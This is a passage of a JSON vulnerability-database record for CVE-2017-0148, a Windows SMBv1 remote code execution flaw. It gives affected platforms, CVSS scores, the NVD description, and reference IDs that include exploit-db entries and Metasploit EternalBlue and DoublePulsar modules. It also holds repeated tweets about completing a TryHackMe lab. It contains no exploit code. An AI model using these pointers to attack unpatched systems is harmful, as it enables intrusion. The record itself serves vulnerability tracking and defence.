"cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0148"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.", "edition": 5, "enchantments": {"dependencies": {"modified": "2020-10-03T13:07:29", "references": [{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["SMNTC-96706"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["MS:CVE-2017-0148"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "exploitation": {"modified": "2020-10-03T13:07:29", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}]}, "score": {"modified": "2020-10-03T13:07:29", "rev": 2, "value": 9.3, "vector": "NONE"}, "twitter": {"counter": 26, "modified": "2020-10-03T13:07:29", "tweets": [{"link": "https://twitter.com/haisenb3rg/status/1355219896876101633", "text": "Blue - I have just completed this room! Check it out: https://t.co/wl8T2v20v5?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/0xMando/status/1354504708145213440", "text": "Blue - I have just completed this room! Check it out: https://t.co/CM3xc69bUu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe I did it mom! /darkstar7471"}, {"link": "https://twitter.com/strudinox/status/1352367654514814976", "text": "Blue - I have just completed this room! Check it out: https://t.co/kUcxTcX0cK?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/DaemonExala/status/1355469648314163201", "text": "Blue - I have just completed this room! Check it out: https://t.co/pRJxaPlaBu?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue /hashtag/MS17?src=hashtag_click-010 /hashtag/CVE2017?src=hashtag_click-0144 /hashtag/CVE?src=hashtag_click-2017-0145 /hashtag/CVE?src=hashtag_click-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/td_dixit/status/1349910672750985216", "text": "Blue - I have just completed this room! Check it out: https://t.co/FGWdT3Euk8?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/mell0wx/status/1350568935335358464", "text": "Blue - I have just completed this room! Check it out: https://t.co/C1ARvEqI3z?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Wrth1_/status/1350977622700937217", "text": "Blue - I have just completed this room! Check it out: https://t.co/Obry4AfJD1?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/reason2008/status/1352019208620683266", "text": "Blue - I have just completed this room! Check it out: https://t.co/eudEV3HK2W?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/m3t4ll0rdz/status/1353147857017176069", "text": "Blue - I have just completed this room! Check it out: https://t.co/6r4PlwLHqj?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/CreatureofHabi7/status/1351637620674211841", "text": "Blue - I have just completed this room! Check it out: https://t.co/RchZjhOQvw?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [], "hash": "97ee47bce2e8543269405dde542f5cc98bcac067016109291e27c873fd2aa2ee", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "3f9465465d68d8a7f86e1cb1f3804b2c", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6a3356b5136599746533482cee29bc14", "key": "title"}, {"hash": "dd4a1fba31e29c6988f563bdeb65c80c", "key": "affectedConfiguration"}, {"hash": "dc7888ec5bcb36228c71cf6f35f01dee", "key": "references"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "extraReferences"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a142b7b1b3b74c6f44646072d5968b9a", "key": "description"}, {"hash": "b99edf73073813cd4c0252d2eb2a41b1", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0148", "id": "CVE-2017-0148", "lastseen": "2020-10-03T13:07:29", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "http://www.securitytracker.com/id/1037991", "http://www.securityfocus.com/bid/96706", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0148", "type": "cve", "viewCount": 56}, "differentElements": ["extraReferences"], "edition": 5, "lastseen": "2020-10-03T13:07:29"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "dd4a1fba31e29c6988f563bdeb65c80c"}, {"key": "affectedSoftware", "hash": "e758f8fa39ce9e8de2ffe527ec8b6423"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "a173072793578541ea04b7baa0323592"}, {"key": "cpe23", "hash": "0751f4e56f29adf827144e01a128331d"}, {"key": "cpeConfiguration", "hash": "6ac681e59932d7c840205e984b11bad5"}, {"key": "cvelist", "hash": "b99edf73073813cd4c0252d2eb2a41b1"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "cwe", "hash": "226da5129ffaaee3d5b48e506b957d58"}, {"key": "description", "hash": "a142b7b1b3b74c6f44646072d5968b9a"}, {"key": "extraReferences", "hash": "bdb1fd133bbc616329b17a26e814341c"}, {"key": "href", "hash": "3f9465465d68d8a7f86e1cb1f3804b2c"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d68798550042e5272198c20ea65d8f01"}, {"key": "published", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "references", "hash": "dc7888ec5bcb36228c71cf6f35f01dee"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "6a3356b5136599746533482cee29bc14"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "427d73407a3d8e1b7b23a71614d396a8cdbe4f730fd534056cb6014d507067ae", "viewCount": 124, "enchantments": {"dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-04-23T00:07:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}], "modified": "2021-04-23T00:07:42"}, "score": {"value": 9.3, "vector": "NONE", "modified": "2021-04-23T00:07:42", "rev": 2}, "twitter": {"counter": 87, "tweets": [{"link": "https://twitter.com/RonnyArias/status/1422356892483981314", "text": "Blue - I have just completed this room! Check it out: https://t.co/TJq1bBTWoK?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/QuentinCasares/status/1422521751523762177", "text": "Blue - I have just completed this room! Check it out: https://t.co/0l0HtT6bML?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/shadow44406573/status/1423260611429998593", "text": "Blue - I have just completed this room! Check it out: https://t.co/sijYaXhkoQ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/top_wizard/status/1423289010630270995", "text": "Blue - I have just completed this room! Check it out: https://t.co/1ICOkz0X0h?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/InfoSec_MBE/status/1425558031790657546", "text": "Blue - I have just completed this room! Check it out: https://t.co/Tms9b4JF84?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/uk_NJx/status/1426573521308762112", "text": "Blue - I have just completed this room! Check it out: https://t.co/B1WGZBexHA?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/carlos_o_m/status/1426612611009892352", "text": "Blue - I have just completed this room! Check it out: https://t.co/6jaCHwnUja?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click a trav\u00e9s de /RealTryHackMe"}, {"link": "https://twitter.com/AynRandSucks/status/1429439489068306434", "text": "Blue - I have just completed this room! Check it out: https://t.co/Ypt3f3Ra8A?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/cts_technology/status/1429414666082607108", "text": "Finally!\nBlue - I have just completed this room! Check it out: https://t.co/hJYxVXD4we?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/0x6d61/status/1430147082573074436", "text": "Blue - I have just completed this room! Check it out: https://t.co/08xRz1yFx7?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}], "modified": "2021-04-23T00:07:42"}}, "objectVersion": "1.5", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-20"], "scheme": null, "affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", 